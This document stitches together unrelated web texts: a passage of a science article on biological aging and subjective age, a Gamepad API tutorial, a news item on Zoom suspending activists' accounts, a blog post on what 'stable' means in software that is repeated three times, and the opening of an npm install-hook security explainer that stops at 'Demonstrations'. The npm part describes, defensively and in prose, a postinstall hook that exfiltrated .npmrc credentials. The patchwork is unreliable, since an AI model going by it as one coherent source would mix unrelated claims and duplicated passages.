IN THE YEAR 1959: A psychology experiment that took seniors back to a time when they were young—1959, to be exact—revealed that living as they did in 1959 improved their memory, vision, and hearing. Image credits: Robert Riger / Getty Images; Luis Korda / Wikipedia; Wikipedia
Langer’s experiment was a tantalizing demonstration that our chronological age based on our birthdate is a misleading indicator of aging. Langer, of course, was tackling the role of the mind in how old we feel and act. Since her study, others have taken a more objective look at the aging body. The goal is to determine an individual’s “biological age,” a term that aims to capture the body’s physiological development and decline with time, and predict, with reasonable accuracy, the risks of disease and death. As scientists have worked to pinpoint a person’s biological age, they have learned that organs and tissues often age differently, making it difficult to reduce biological age to a single number. They have also made a discovery that echoes Langer’s work. How old we feel—our subjective age—can influence how we age. Where age is concerned, the pages torn off a calendar do not tell the whole story.
While we intuitively know what it means to grow old, precise definitions of aging haven’t been easy to come by. In 1956, British gerontologist and author Alex Comfort (later famous for writing The Joy of Sex) memorably defined senescence as “a decrease in viability and an increase in vulnerability.” Any given individual, he wrote, would die from “randomly distributed causes.” Evolutionary biologists think of aging as something that reduces our ability to survive and reproduce because of “internal physiological deterioration.” Such deterioration, in turn, can be understood in terms of cellular functions: The older the cells in an organ, the more likely they are to stop dividing and die, or develop mutations that lead to cancer. This leads us to the idea that our bodies may have a true biological age.
The road to determining that age, though, has not been a straight one. One approach is to look for so-called biomarkers of aging, something that’s changing in the body and can be used as a predictor of the likelihood of being struck by age-related diseases or of how much longer one has left to live. An obvious set of biomarkers could be attributes like blood pressure or body weight. Both tend to go up as the body ages. But they are unreliable. Blood pressure can be affected by medication and body weight depends on lifestyle and diet, and there are people who certainly don’t gain weight as they age.
In the 1990s, one promising biomarker stood out: stretches of DNA called telomeres. They appear at the ends of chromosomes, serving as caps that protect the chromosomes from fraying. Telomeres have often been likened to the plastic tips that similarly protect shoelaces. It turns out that telomeres themselves get shorter and shorter each time a cell divides. And when the telomere shortens beyond a point, the cell dies. There’s a strong relationship between telomere length and health and diseases, such as cancer and atherosclerosis.
But despite a range of studies trying to find such a link, it’s been hard to make the case for telomeres as accurate biomarkers of aging. In 2013, Anne Newman, director of the Center for Aging and Population Health at the University of Pittsburgh, and her student Jason Sanders reviewed the existing literature on telomeres and concluded that “if telomere length is a biomarker of human aging, it is a weak biomarker with poor predictive accuracy.”
“Twenty years ago, people had high hopes that telomere length could actually explain aging, as in biological aging. There was a hope that it would be the root cause of aging,” says Steve Horvath, a geneticist and biostatistician at the University of California, Los Angeles. “Now we know that that’s simply not the case. In the last 10 to 15 years, people realized that there must be other mechanisms that play an important role in aging.”
Attention shifted to how fast stem cells are being depleted in the body, or the efficacy of mitochondria (the organelles inside our cells that produce the energy needed for cells to function). Horvath scoured the data for reliable markers, looking at, for example, levels of gene expression for any strong correlations to aging. He found none.
But that didn’t mean there weren’t reliable biomarkers. There was one set of data Horvath had been studiously avoiding. This had to do with DNA methylation, a process cells use to switch off genes. Methylation mainly involves the addition of a so-called methyl group to cytosine, one of the four main bases that make up strands of DNA. Because DNA methylation does not alter the core genetic sequence, but rather modifies gene expression externally, the process is called epigenetics.
EPIGENETIC CLOCK: UCLA geneticist Steve Horvath identified methylation levels on the human genome that serve as remarkable signs of biological aging. “I had never seen anything like it,” he says. “It’s a cliché, but it really was a smoking gun.” Courtesy of Steve Horvath
Horvath didn’t think that epigenetics would have anything to do with aging. “I had data sitting there and I would not really touch them, because I thought there was no meaning in it anyway,” he says.
But some time in 2009, Horvath gave in and analyzed a dataset of methylation levels at 27,000 locations on the human genome—an analysis “you can do in an hour,” he says. Nothing in his 10 years of analyzing genomic datasets had prepared him for the results. “I had never seen anything like it,” he says. “It’s a cliché, but it really was a smoking gun.”
After a few more years of “labor intensive” work, Horvath identified 353 special sites on the human genome that were present in cells in every tissue and organ. Horvath developed an algorithm that used the methylation levels at these 353 sites—regardless of the cell type—to establish an epigenetic clock. His algorithm took into account that in some of these 353 sites, the methylation levels decreased with age, while in others they increased.
In 2013, Horvath published the results of his analysis of 8,000 samples taken from 51 types of healthy tissue and cells, and the conclusions were striking. When he calculated a single number for the biological age of the person based on the weighted average of the methylation levels at the 353 sites, he found that this number correlated well with the chronological age of the person (it was off by less than 3.6 years in 50 percent of the people—a far better correlation than has been obtained for any other biomarker). He also discovered that for middle-aged people and older, the epigenetic clock starts slowing down or speeding up—providing a way of telling whether someone is aging faster or slower than the calendar suggests.
Despite the correlation, Horvath says that biological age, rather than being for the whole body, is better applied to specific tissues and organs, whether it’s bone, blood, heart, lungs, muscles, or even the brain. The difference between the biological age and chronological age can be negative, zero, or positive. A negative deviation means that the tissue or organ is younger than expected; a zero indicates that the tissue is aging normally; and a positive deviation means the tissue or organ is older. Data show that different tissues can age at different rates.
In general, diseases speed up the epigenetic clock, and this is particularly striking in patients with Down’s syndrome or in those infected with HIV. In both cases, the tissues tend to age faster than normal. For instance, the blood and brain tissue in those infected with HIV show accelerated aging. Obesity causes the liver to age faster. And studies of people who died of Alzheimer’s disease show that the prefrontal cortex undergoes accelerated aging. Horvath also analyzed 6,000 samples of cancerous tissue and found that the epigenetic clock was ticking much faster in such cases, showing that the tissue had aged significantly more than the chronological age.
Despite this wealth of data, there is a gaping hole in our understanding of this striking correlation between methylation markers and biological age. “The biggest weakness of the epigenetic clock is that we just don’t understand the precise molecular mechanism behind it,” says Horvath. His speculation—and he stresses it’s just speculation—is that the epigenetic clock is related to what he calls the “epigenetic maintenance system,” molecular and enzymatic processes that maintain the epigenome and protect it from damage. “I feel that these markers are a footprint of that mechanism,” says Horvath. But “why is it so accurate? What pathway relates to it? That’s the biggest challenge right now,” he adds.
Even without understanding exactly how and why it works, the epigenetic clock gives researchers a tool to test the efficacy of anti-aging interventions that can potentially slow aging. “It’d be very exciting to develop a therapy that allows us to reset the epigenetic clock,” says Horvath.
While Horvath is thinking about hormonal treatments, Langer’s work with elderly men at the monastery in New Hampshire suggests that we can use the power of our mind to influence the body. Langer didn’t publish her results in a scientific journal in 1979. At the time, she didn’t have the resources to do a thorough study for the leading journals. “When you run a retreat over the course of five days, it’s very hard to control for everything,” Langer says. “Also, I didn’t have the funds to have, for instance, a vacationing control group. I could have published it in a second-rate journal, but I didn’t see any point to that. I wanted to get the information out there and I wrote it first in a book for Oxford University Press, so it was reviewed.”
Also, her argument that mind and body are one was potentially a little too path-breaking for the journals. “I think they were unlikely to buy the theoretical part of it,” she says. “The findings, improving vision and hearing in an elderly population, were so unusual that they were not going to rush to publish and stick their necks out.” Since then, Langer has pursued the mind-body connection and its effects on physiology and aging in rigorous studies that have been published in numerous scientific journals and books.
Traditionally, the mind-body problem refers to the difficulty of explaining how our ostensibly non-material mental states can affect the material body (clearly seen in the placebo effect). To Langer, the mind and body are one. “Wherever you put the mind you are necessarily putting the body,” she says.
So Langer began asking if subjective mental states could influence something as objective as the levels of blood sugar in patients with Type 2 diabetes. The 46 subjects in her study, all suffering from Type 2 diabetes, were asked to play computer games for 90 minutes. On their desk was a clock. They were asked to switch games every 15 minutes. The twist in the study was that for one-third of the subjects, the clock was ticking slower than real time, for one-third it was going faster, and for the last third, the clock was keeping real time.
“The question we were asking was would blood sugar level follow real or perceived time,” says Langer. “And the answer is perceived time.” This was a striking illustration of psychological processes—in this case the subjective perception of time—influencing metabolic processes in the body that control the level of blood sugar.
Although Langer did not explore a connection between the mind and epigenetic changes, other studies suggest such a link. In 2013, Richard Davidson of the University of Wisconsin at Madison and his colleagues reported that even one day of mindfulness meditation can impact the expression of genes. In their study, 19 experienced meditators were studied before and after a full day of intensive meditation. As a control, the researchers similarly studied a group of 21 people who engaged in a full day of leisure. At the end of the day, the meditators showed lowered levels of activity of inflammatory genes—exactly the kind of effect seen when one takes anti-inflammatory drugs. The study also showed lowered activity of genes that are involved in epigenetically controlling the expression of other genes. The state of one’s mind, it seems, can have an epigenetic effect.
Such studies taken together provide clues as to why the week-long retreat in New Hampshire reversed some of the age-related attributes in elderly men. Because their minds were taken back to a time when they were younger, their bodies too went back to that earlier time, bringing about some of the physiological changes that resulted in improved hearing or grip strength.
But it’s important to point out that biological aging is an inexorable process—and there comes a time when no amount of thinking positive thoughts can halt aging. If body and mind are one and the same—as Langer suggests—then an aging body and aging mind go hand-in-hand, limiting our ability to influence physiological decline with psychological deftness.
Still, Langer thinks that how we age has a lot to do with our perceptions of what aging means—often reinforced by culture and society. “Whether it’s about aging or anything else, if you are surrounded by people who have certain expectations for you, you tend to meet those expectations, positive or negative,” says Langer.
Most of us are slaves to our chronological age, behaving, as the saying goes, age-appropriately. For example, young people often take steps to recover from a minor injury, whereas someone in their 80s may accept the pain that comes with the injury and be less proactive in addressing the problem. “Many people, because of societal expectations, all too often say, ‘Well, what do you expect, as you get older you fall apart,’ ” says Langer. “So, they don’t do the things to make themselves better, and it becomes a self-fulfilling prophecy.”
It’s this perception of one’s age, or subjective age, that interests Antonio Terracciano, a psychologist and gerontologist at Florida State University College of Medicine. Horvath’s work shows that biological age is correlated with diseases. Can one say the same thing about subjective age?
People’s perception of their own age can differ markedly from person to person. People between the ages of 40 and 80, for example, tend to think they are younger. People who are 60 may say that they feel like they are 50 or 55, or sometimes even 45. Rarely will they say they feel older. However, people in their 20s often perceive their age to be the same as their chronological age, and may say they feel somewhat older.
Terracciano and colleagues have found that subjective age correlates with certain physiological markers of aging, such as grip strength, walking speed, lung capacity, and even the levels of C-reactive protein in the blood, an indication of inflammation in the body. The younger you feel you are, the better are these indicators of age and health: You walk faster, have better grip strength and lung capacity, and less inflammation.
Subjective age affects cognition and is an indicator of the likelihood of developing dementia. Terracciano and colleagues looked at data collected from 5,748 people aged 65 or older. The subjects’ cognitive abilities were evaluated to establish a baseline and they were then followed for a period of up to four years. The subjects were also asked about how old they felt at each instance. The researchers found that those who had a higher subjective age to start with were more likely to develop cognitive impairments and even dementia.
These correlation studies have limitations, however. For example, it’s possible that physically active people, who have better walking speed and lung capacity, and lower levels of C-reactive protein in their blood, naturally feel younger. How can one establish that our subjective age influences physiology and not the other way around?
That’s exactly what Yannick Stephan of the University of Grenoble in France and colleagues tried to find out. They recruited 49 adults, aged between 52 and 91, and divided them into an experimental and control group. Both groups were first asked their subjective age—how old they felt as opposed to their chronological age—and tested for grip strength to establish a baseline. The experimental group was told they had done better than 80 percent of people their age. The control group received no feedback. After this experimental manipulation, both groups were tested again for grip strength and asked about how old they felt. The experimental group reported feeling, on average, younger than their baseline subjective age. No such change was seen in the control group. Also, the experimental group showed an increase in grip strength, while the grip strength of the control decreased somewhat.
These correlations do not necessarily mean that feeling young causes better health. Terracciano’s next step is to correlate subjective age with quantitative biological markers of age. While no study has yet been done to find associations between the newly developed epigenetic markers and subjective age, Terracciano is keen to see if there are strong correlations.
Still, the message seems to be that our chronological age really is just a number. “If people think that because they are getting older they cannot do things, or cut their social ties, or incorporate this negative view which limits their life, that can be really detrimental,” says Terracciano. “Fighting those negative attitudes, challenging yourself, keeping an open mind, being engaged socially, can absolutely have a positive impact.”
Anil Ananthaswamy is an award-winning journalist and author. His first book, The Edge of Physics, was named Book of the Year in 2010 by PhysicsWorld. His second book, The Man Who Wasn’t There, was nominated for the PEN/E. O. Wilson Literary Science Writing Award. @AnilAnanth
title: Web platform's hidden gems - Gamepad API
description: A few weeks back I started the Web Platform's hidden gems blog series. The idea behind the series is to cover the native API enhancements to the web platform and shed some light on how these APIs can be used to create some really interesting experiences on the web.
image: https://arunmichaeldsouza.com/img/blogs/web-platform's-hidden-gems---gamepad-api/1.png
Image source - vecteezy.com
A few weeks back I started the Web platform's hidden gems blog series. The idea behind the series is to cover the native API enhancements to the web platform and shed some light on how these APIs can be used to create some really interesting experiences on the web.
Even though these APIs are in very early stages at the moment, they seem really promising and give an idea of what web development might look like in the coming years. That said, I feel it's important for developers to know about these specifications and understand the possibilities that the native web has to offer!
This is the first blog post of the series and in this post, I'll be talking about the Gamepad API.
Just a disclaimer though, this API is in very early stages and may undergo major changes in terms of implementation and usage.
Connecting a gamepad to the browser
The Gamepad specification defines a low-level interface that represents gamepad devices.
This means that using this API, developers can connect gamepads and similar input devices to the browser and use them in their gaming applications. There would be no need to design complex mouse/keyboard-based interfaces for game controls, which can be tricky to operate and take some time to get used to. Game developers would be able to provide more natural controls to their users, like joystick-driven character movements.
The gamepadconnected event is emitted whenever a new gamepad is connected to the page. If the gamepad is already connected when the page loads and gains focus then the event is emitted when a button is pressed or an axis is moved on the gamepad.
Logging info of a connected gamepad
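In code, a minimal sketch of such a listener looks like this (the log message is just illustrative):

```javascript
// Fired when a gamepad connects (or, if it was already connected,
// when a button is first pressed or an axis is first moved).
window.addEventListener('gamepadconnected', (event) => {
  const gp = event.gamepad;
  console.log(
    `Gamepad connected at index ${gp.index}: ${gp.id} ` +
    `(${gp.buttons.length} buttons, ${gp.axes.length} axes)`
  );
});
```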
The window.navigator.getGamepads() method returns an array of Gamepad objects, one for each gamepad connected to the device. The Gamepad API supports up to 4 simultaneous connections at the moment.
If you log the 0th index (the first connected gamepad), you can see the gamepad info -
The Gamepad interface stores information about the connected gamepad
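Here's a rough sketch of what that looks like, with the main Gamepad properties annotated:

```javascript
// getGamepads() returns a 4-slot array; unused slots are null.
const gamepads = window.navigator.getGamepads();
const gp = gamepads[0]; // the first connected gamepad

if (gp) {
  console.log(gp.id);        // vendor/product string identifying the controller
  console.log(gp.index);     // slot index (0-3)
  console.log(gp.connected); // true while the gamepad remains connected
  console.log(gp.mapping);   // "standard" if the browser maps it to the standard layout
  console.log(gp.buttons);   // array of GamepadButton objects (pressed, value)
  console.log(gp.axes);      // array of axis values between -1.0 and 1.0
}
```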
The gamepaddisconnected event is emitted whenever a gamepad (which has previously received data from the page) has been disconnected.
Logging info of a disconnected gamepad
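And the corresponding listener, as a minimal sketch:

```javascript
// Fired when a gamepad that the page has received data from disconnects.
window.addEventListener('gamepaddisconnected', (event) => {
  const gp = event.gamepad;
  console.log(`Gamepad disconnected from index ${gp.index}: ${gp.id}`);
});
```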
Tracking button press and axis movement
Currently, the Gamepad API only supports these two events - gamepadconnected and gamepaddisconnected. There is no standardized way to detect gamepad button presses or axis movements. The Gamepad interface does return useful information about the gamepad buttons, axes and their current states (button press and axis movement values) but there is no actual event that is dispatched when these actions are performed by the user.
Capturing button state changes using requestAnimationFrame()
In the context of a video game, a game loop is something that continuously checks for user input, updates the game state and renders the scene. requestAnimationFrame() fits well here, as we can perform all of these operations in its callback and stay in sync with the browser's repaint tasks in every frame.
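Here's a rough sketch of such a polling loop (the button and axis handling is just illustrative):

```javascript
// Game loop: poll the first gamepad's state once per animation frame.
function pollGamepad() {
  const gp = navigator.getGamepads()[0];
  if (gp) {
    // Check every button's current state.
    gp.buttons.forEach((button, index) => {
      if (button.pressed) {
        console.log(`Button ${index} pressed (value: ${button.value})`);
      }
    });
    // Axes report values between -1.0 and 1.0; ignore small stick drift.
    const [stickX, stickY] = gp.axes;
    if (Math.abs(stickX) > 0.1 || Math.abs(stickY) > 0.1) {
      console.log(`Left stick at (${stickX.toFixed(2)}, ${stickY.toFixed(2)})`);
    }
  }
  window.requestAnimationFrame(pollGamepad);
}

window.requestAnimationFrame(pollGamepad);
```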
Ideally that's how user input should be polled in a gaming application.
I'd highly recommend checking this article - Anatomy of a video game, if you want to know more about how a typical game loop workflow can be implemented in JavaScript.
This does give us the user input states as expected but we still need a way to store and discard these values in an efficient way. Ideally in the form of an API that can be exposed and reused in any gaming application.
That is the very reason why I created joypad.js, a JavaScript library that lets you connect and use various gaming controllers with browsers that support the Gamepad API. It's less than 5KB in size with zero dependencies, and it supports button press and axis movement events as well as the vibration play effect.
Subscribing to events is as simple as specifying an event name and a callback that is fired whenever the specified event is triggered.
Subscribing to an event using joypad.js
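Roughly like this (a sketch based on joypad.js's documented API; the exact event names and payload fields may have changed, so check the GitHub page):

```javascript
// Assumes joypad.js has been loaded, e.g. via a script tag exposing a global `joypad`.
joypad.on('button_press', (e) => {
  // The event detail carries info about which button was pressed.
  const { buttonName } = e.detail;
  console.log(`${buttonName} was pressed!`);
});
```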
For more details on how to use it, or to learn how it works under the hood (spoiler alert: it uses the requestAnimationFrame() polling technique), please feel free to visit its GitHub page.
Now coming back to the Gamepad API, the button/axis layout is as follows -
This is the Standard Gamepad button layout, supported by most controllers, in which buttons are laid out in a left cluster of four, a right cluster of four, a center cluster of three (some controllers have four), and a pair of front-facing buttons (shoulder buttons) on each side of the gamepad.
Please note that since the Gamepad API is in very early stages, the standard gamepad button layout may differ from browser to browser. The image shown above describes the default button mappings as on Chrome.
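For reference, here's a partial sketch of the indices defined by the W3C's standard mapping (verify against your target browsers, since mappings can vary):

```javascript
// Commonly used button indices in the "standard" mapping.
const STANDARD_BUTTONS = {
  0: 'Bottom face button (A / Cross)',
  1: 'Right face button (B / Circle)',
  2: 'Left face button (X / Square)',
  3: 'Top face button (Y / Triangle)',
  4: 'Left shoulder (L1)',
  5: 'Right shoulder (R1)',
  6: 'Left trigger (L2)',
  7: 'Right trigger (R2)',
  8: 'Select / Back',
  9: 'Start / Forward',
  12: 'D-pad up', 13: 'D-pad down', 14: 'D-pad left', 15: 'D-pad right',
};

// Axes 0/1 are the left stick (x, y); axes 2/3 are the right stick.
```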
Browser support
As of now the Gamepad specification is a work in progress and was published by the Web Applications Working Group as a working draft. The specification is intended to become a W3C recommendation.
I would like to point out again that the Gamepad API is in very early stages so it may undergo major changes in terms of implementation and usage. But that shouldn't stop you from experimenting with it. So go ahead give it a try, add gamepad support to your existing games or maybe develop some new ones!
In the next blog post of the series, I'll be covering the Accelerometer API. So keep an eye on this space for more info.
That pretty much sums it up! If you have any questions or suggestions, don't forget to leave a comment down below. Also, feel free to say hi 👋 to me on Twitter and Github.
Cheers!
Published on Sun Jun 14 2020
title: Zoom acknowledges its compliance with the Chinese government and suspends rights activists' accounts
author: Indra Shambahamphe
description: Video conferencing software company Zoom acknowledged that, at the request of the Chinese government, the company suspended user accounts in the United States and Hong Kong, and intends to add functionality to block or remove meeting participants from mainland China.
image: https://baseread.com/wp-content/uploads/2020/04/Zoom-Accounts.png
Video conferencing software company Zoom acknowledged that, at the request of the Chinese government, the company suspended user accounts in the United States and Hong Kong, and intends to add functionality to block or remove meeting participants from mainland China.
Zoom suspended the accounts of three activists last week: Li Zhuoren, Wang Dan, and Zhou Fengsuo, who used the service to hold online discussions marking the anniversary of the Tiananmen massacre. Two of these accounts are based in Hong Kong and one in the United States.
The company said it suspended these accounts at the request of the Chinese government, although it is unclear which laws the hosts, none of whom live in mainland China, are supposed to have violated.
Zoom stated in a blog post that it suspended the users after “the Chinese government informed us that this activity is illegal in China and demanded that Zoom terminate the meetings and host accounts.” The company added: “We are committed to being a platform for the open exchange of ideas and dialogue.”
Zoom has now restored the accounts of these three users, but in effect it deprived them of the opportunity to talk to other democracy organizers at a critical time. Zoom said it took this measure because it cannot block meeting participants by country or region, so when it saw some mainland Chinese users attending a meeting, it had to terminate the whole meeting.
Zoom said: “Technology will be developed over the next few days that will allow us to remove or block participants based on geographic location. This will enable us to comply with requests from local authorities when they determine that activity on our platform is illegal within their borders.”
The company said: “Going forward, Zoom will not allow requests from the Chinese government to affect anyone outside of mainland China.” But this is unlikely to comfort activists in mainland China or Hong Kong who are looking for a safe way to communicate with each other or with contacts abroad.
An affected activist, Li Zhuoren, who is based in Hong Kong, expressed frustration with the company’s actions to the Guardian. He said: “They have restored my account, but Zoom continues to kneel in front of the Communist Party.”
“The purpose of opening the Zoom account was to reach mainland China and break through the censorship system of the Communist Party of China. With this policy, I cannot achieve that original intention.”
On Friday, a dozen bipartisan legislators led by Senators Marco Rubio and Ron Wyden sent a letter to Eric Yuan, CEO of Zoom, requesting further details about how many accounts the company has closed at the request of the Chinese government. The lawmakers also raised concerns about whether Zoom shares user data with the Chinese government. They said at the end of the letter that Zoom “must be transparent and foreign governments are not allowed to dictate terms of use.”
title: Stable vs stable: what ‘stable’ means in software – The Bit Depth Blog
author: Thomas Rutter
description: I’ve come to learn that when someone refers to software as ‘stable’, there is more than one quite different thing they might mean.
image: https://secure.gravatar.com/avatar/4b21dfab5586c78d7f29d4c56c91e5dc?s=100&d=mm&r=g
I’ve come to learn that when someone refers to software as ‘stable’, there is more than one quite different thing they might mean.
A stable software release
A stable software release is so named because it is unchanging. Its behaviour, functionality, specification or API is considered ‘final’ for that version. Apart from security patches and bug fixes, the software will not change for as long as that version of the software is supported, usually anywhere from one to many years.
Software that is intended for the public to use is usually “stable”. It is released, and following the release no new features are added apart from the odd bug fix. To get new functionality users eventually need to upgrade to the next version. Any problems with the software (unless they can easily be fixed with a bug fix update) are “known” problems, and the software vendor does not need to keep track of more than one variation of these problems for any given version.
Examples of releases that are the opposite of stable include development snapshots, beta releases, and rolling releases. A characteristic of all three of these is that they are in a frequent state of change; even their functionality and feature list can change from week to week, or day to day. You cannot depend on them to behave the same way from one week to the next.
Some people like that with non-stable releases such as development snapshots, beta releases or rolling releases, they are always getting the latest features as soon as they are written into the software. In many cases, these releases also fix deficiencies or bugs that would otherwise remain stagnant in the stable release. However, with no stability in the feature list or functionality, this affects the ability for documentation, other software that interfaces with the software, plugins, and more to function: a change in the software can mean these become out of date or fail to work anymore. When you have software which needs to work well with a lot of other software, having a stable release reduces the frequency with which changes in the software will break compatibility with the other software relying on it.
Another meaning of stable
Another meaning of stable exists in common use, where people take it to mean “working reliably” or “solid”. That is, people refer to software that runs consistently without crashing as stable. You can see why they may use the word in this way: in real life, when something can be described as stable, it won’t fall over. If a chair is stable enough, you can sit in it and it won’t topple or collapse.
However, confusion arises when people use this form of the word stable to refer to software that isn’t stable in the earlier sense. For example, it’s why you see comments like “I’ve been using the beta version since February and it is very stable” or “the newer version is more stable”. The point that these comments make is not that the software is final and unchanging, as in a stable software release, but more that the software is stable like a chair might be stable. It seems reliable, and the user hasn’t experienced any major problems.
This kind of stability won’t help developers extending the software with other software, or writing plugins or customisations for the software, since the fact that at any given time the software is running well does not make up for the fact that the software is subject to frequent changes.
Commenters or reviewers who describe beta or rolling releases of software as stable might want to try describing them as “solid” or “reliable” instead, to avoid confusion with a stable release, which is an unchanging release. Or perhaps the fact that the same term is understood in two different and sometimes conflicting ways indicates that the term is not an ideal one in the first place. It does, however, seem firmly entrenched in the software development world, where the meaning of a stable release is well known.
I’ve come to learn that when someone refers to software as ‘stable’, there is more than one quite different thing they might mean.
A stable software release
A stable software release is so named because it is unchanging. Its behaviour, functionality, specification or API is considered ‘final’ for that version. Apart from security patches and bug fixes, the software will not change for as long as that version of the software is supported, usually from 1 to many years.
Software that is intended for the public to use is usually “stable”. It is released, and following the release no new features are added apart from the odd bug fix. To get new functionality users eventually need to upgrade to the next version. Any problems with the software (unless they can easily be fixed with a bug fix update) are “known” problems, and the software vendor does not need to keep track of more than one variantion of these problems for any given version.
Examples of releases that are the opposite of stable include development snapshots, beta releases, and rolling releases. A characteristic of all three of these is that they are in a frequent state of change; even their functionality and feature list can change from week to week, or day to day. You cannot depend on them to behave the same way from one week to the next.
Some people like that with non-stable releases such as development snapshots, beta releases or rolling releases, they are always getting the latest features as soon as they are written into the software. In many cases, these releases also fix deficiencies or bugs that would otherwise remain stagnant in the stable release. However, with no stability in the feature list or functionality, this affects the ability for documentation, other software that interfaces with the software, plugins, and more to function: a change in the software can mean these become out of date or fail to work anymore. When you have software which needs to work well with a lot of other software, having a stable release reduces the frequency with which changes in the software will break compatibility with the other software relying on it.
Another meaning of stable
Another meaning of stable exists in common use, where people take it to mean “working reliably” or “solid”. That is, people refer to software that runs consistently without crashing as stable. You can see why they may use the word in this way: in real life, when something can be described as stable, it won’t fall over. If a chair is stable enough, you can sit in it and it won’t topple or collapse.
However, confusion arises when people use this form of the word stable to refer to software that isn’t stable in the earlier sense. For example, it’s why you see comments like “I’ve been using the beta version since February and it is very stable” or “the newer version is more stable”. The point that these comments make is not that the software is final and unchanging, as in a stable software release, but more that the software is stable like a chair might be stable. It seems reliable, and the user hasn’t experience any major problems.
This kind of stability won’t help developers extending the software with other software, or writing plugins or customisations for the software, since the fact that at any given time the software is running well does not make up for the fact that the software is subject to frequent changes.
Commenters or reviewers who describe beta or rolling releases of software as stable, might want to try describing them as “solid” or “reliable” instead, to save confusion with a stable release which is an unchanging release. Or, the fact that the same term is understood in two different and sometimes conflicting ways may indicate that the term is not an ideal one in the first place. It does, however, seem firmly entrenched in the software development world, where the meaning of a stable release is well known.
I’ve come to learn that when someone refers to software as ‘stable’, there is more than one quite different thing they might mean.
A stable software release
A stable software release is so named because it is unchanging. Its behaviour, functionality, specification or API is considered ‘final’ for that version. Apart from security patches and bug fixes, the software will not change for as long as that version of the software is supported, usually from 1 to many years.
Software that is intended for the public to use is usually “stable”. It is released, and following the release no new features are added apart from the odd bug fix. To get new functionality users eventually need to upgrade to the next version. Any problems with the software (unless they can easily be fixed with a bug fix update) are “known” problems, and the software vendor does not need to keep track of more than one variantion of these problems for any given version.
Examples of releases that are the opposite of stable include development snapshots, beta releases, and rolling releases. A characteristic of all three of these is that they are in a frequent state of change; even their functionality and feature list can change from week to week, or day to day. You cannot depend on them to behave the same way from one week to the next.
Some people like that with non-stable releases such as development snapshots, beta releases or rolling releases, they are always getting the latest features as soon as they are written into the software. In many cases, these releases also fix deficiencies or bugs that would otherwise remain stagnant in the stable release. However, with no stability in the feature list or functionality, this affects the ability for documentation, other software that interfaces with the software, plugins, and more to function: a change in the software can mean these become out of date or fail to work anymore. When you have software which needs to work well with a lot of other software, having a stable release reduces the frequency with which changes in the software will break compatibility with the other software relying on it.
Another meaning of stable
Another meaning of stable exists in common use, where people take it to mean “working reliably” or “solid”. That is, people refer to software that runs consistently without crashing as stable. You can see why they may use the word in this way: in real life, when something can be described as stable, it won’t fall over. If a chair is stable enough, you can sit in it and it won’t topple or collapse.
However, confusion arises when people use this form of the word stable to refer to software that isn’t stable in the earlier sense. For example, it’s why you see comments like “I’ve been using the beta version since February and it is very stable” or “the newer version is more stable”. The point that these comments make is not that the software is final and unchanging, as in a stable software release, but more that the software is stable like a chair might be stable. It seems reliable, and the user hasn’t experienced any major problems.
This kind of stability won’t help developers who are extending the software with other software, or writing plugins or customisations for it: the software running well at any given time does not make up for it being subject to frequent changes.
Commenters or reviewers who describe beta or rolling releases of software as stable might want to try describing them as “solid” or “reliable” instead, to avoid confusion with a stable release, which is an unchanging release. Or, the fact that the same term is understood in two different and sometimes conflicting ways may indicate that the term is not an ideal one in the first place. It does, however, seem firmly entrenched in the software development world, where the meaning of a stable release is well known.
4 Replies to “Stable vs stable: what ‘stable’ means in software”
Thanks. Have been trying to resolve this confusion for a while, as I have used the word in both senses at different times. More often than not, I’m trying to convey both “not crashing in normal use” and for related reasons “not under rapid development” but still well-maintained. If we’re going to disambiguate, maybe should avoid “unstable” and say “it crashes”. Would it be pretentious to suggest “inchoate” or “in flux” for the other meaning, although I can’t see “Debian unstable” being renamed?
title: npm Install Hook Scripts: Intro (Part 1) description: npm is the de-facto package manager for JavaScript code. Though initially intended for use with node.js, it’s expanded to managing dependencies on the frontend…
npm1 is the de-facto package manager for JavaScript code. Though initially intended for use with node.js, it’s expanded to managing dependencies on the frontend as well. npm makes a developer’s life substantially more convenient, but it provides that convenience at the cost of security. In particular, npm is happy to auto-execute package scripts upon install, thanks to various install hook scripts.
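Any package can declare these hooks in its package.json, and npm will run them automatically during npm install, with the installing user’s privileges and no prompt. A minimal, harmless illustration:

{
  "name": "hello-hooks",
  "version": "1.0.0",
  "scripts": {
    "preinstall": "echo about to install hello-hooks",
    "postinstall": "echo just installed hello-hooks"
  }
}

Installing this package prints both messages; swap the echo commands for anything else and npm will run that too.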
Rising Issues
Historically, the automatic execution of scripts during the install process made sense. The same user privileges that were being used to run npm install were being used to run the node application that leveraged those packages, so any malicious activity could have just as easily been in the package’s JS files (i.e. executing upon require('package')), instead of needing to be triggered by the install hook scripts. However, this assumption no longer holds in many situations. As npm is used to manage frontend dependencies, this assumption breaks down. A user may execute npm install using their fully privileged user account, but the actual JavaScript module in the package will never run outside of the browser’s sandbox. Therefore, the only point at which a package could perform a malicious activity on the user’s machine (such as exfiltrating data from their filesystem, writing arbitrary files, etc.) would be through one of these install hook scripts.
In the Wild
In July of 2018, eslint-scope and eslint-config-eslint were modified to include a postinstall hook script that located a user’s .npmrc file and sent that file to a remote website2. The attacker used previously compromised credentials to publish these malicious versions of the packages. Over the next two hours the compromised packages exfiltrated .npmrc files, and since they were dependencies of an extremely popular package, babel-eslint, it’s likely they had a noticeable install population3. The malicious change was a one-line addition to the package’s scripts:
{
+ "postinstall": "node ./lib/build.js",
}
npm’s Auto-Run Scripts, According To The Docs
npm details the various scripts that are executed automatically during the install process at cli/doc/misc/npm-scripts#e2346e7/. I’ve reproduced the relevant hooks that run during the install and uninstall processes here:
preinstall:
Run BEFORE the package is installed.
install, postinstall:
Run AFTER the package is installed.
preuninstall, uninstall:
Run BEFORE the package is uninstalled.
postuninstall:
Run AFTER the package is uninstalled.
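As an aside, consumers who want to opt out of this behaviour entirely can tell npm to skip lifecycle scripts, at the cost of breaking packages that legitimately need to compile native code:

# Skip hook scripts for a single install
npm install --ignore-scripts

# Or disable them for all installs
npm config set ignore-scripts true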
Additionally, the docs provide a recommendation (emphasis mine):
Don’t use install. Use a .gyp file for compilation, and prepublish for anything else. You should almost never have to explicitly set a preinstall or install script. If you are doing this, please consider if there is another option. The only valid use of install or preinstall scripts is for compilation which must be done on the target architecture.
The last sentence explains why these hooks exist at all, instead of npm just autodetecting the need to handle .gyp files for compilation: npm is trying to be as flexible as possible.
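That valid use conventionally looks like the following in a native addon’s package.json (node-gyp is the real compilation tool; the package name here is made up):

{
  "name": "some-native-addon",
  "version": "1.0.0",
  "scripts": {
    "install": "node-gyp rebuild"
  }
}

In fact, if a package ships a binding.gyp file and declares no install script, npm supplies node-gyp rebuild as the default.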
Demonstrations
